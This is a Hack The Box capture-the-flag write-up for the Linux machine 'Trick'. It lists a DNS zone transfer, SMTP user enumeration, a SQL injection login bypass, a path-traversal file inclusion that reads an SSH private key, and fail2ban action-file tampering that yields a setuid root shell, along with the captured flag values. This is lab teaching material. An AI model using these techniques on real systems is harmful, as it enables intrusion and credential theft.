TrickPlatform: Hack The BoxIP Address: 10.10.11.166Difficulty: Easy
Trick is an Easy Linux machine that demonstrates a variety of enumeration and privilege escalation techniques. The target hosts multiple virtual hosts and a DNS service which must be queried to resolve subdomains. Through SQL injection and local file inclusion, a shell is gained. Root is obtained by exploiting fail2ban misconfiguration via group-writable configuration files.
nmap -p- trick.htb --min-rate 10000
nmap -p 22,25,53,80 trick.htb -sCV -oN nmapscan
dig AXFR trick.htb @10.10.11.166
Revealed subdomain: preprod-payroll.trick.htb
telnet trick.htb 25
VRFY root
VRFY admin
Username: admin' OR 1=1 LIMIT 1;-- -
Login successful on http://preprod-payroll.trick.htb/login.php
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://trick.htb -H "Host: preprod-FUZZ.trick.htb" -fs 5480
Discovered: preprod-marketing.trick.htb
ffuf -w dirTraversal-nix.txt -u http://preprod-marketing.trick.htb/index.php?page=FUZZ -fs 0
Found traversal:
http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd
Confirmed user michael
http://preprod-marketing.trick.htb/index.php?page=..././..././..././home/michael/.ssh/id_rsa
chmod 600 id_rsa
ssh -i id_rsa michael@trick.htb
User flag: dbb4962a2e4eb8f22f428a1e84d54526
sudo -l
(root) NOPASSWD: /etc/init.d/fail2ban restart
fail2ban Config/etc/fail2ban/action.d is group-writable by michael
Modified action file:
actionban = cp /bin/bash /tmp; chmod +s /tmp/bash
actionunban = chmod +s /tmp/bash
Trigger a ban with brute force or crafted traffic, then:
/tmp/bash -p
cat /root/root.txt
3d0fb710908d01e7f224684957fe1512
fail2ban configuration for root access*Writeup by inksec**GitHub: *https://github.com/inkedqt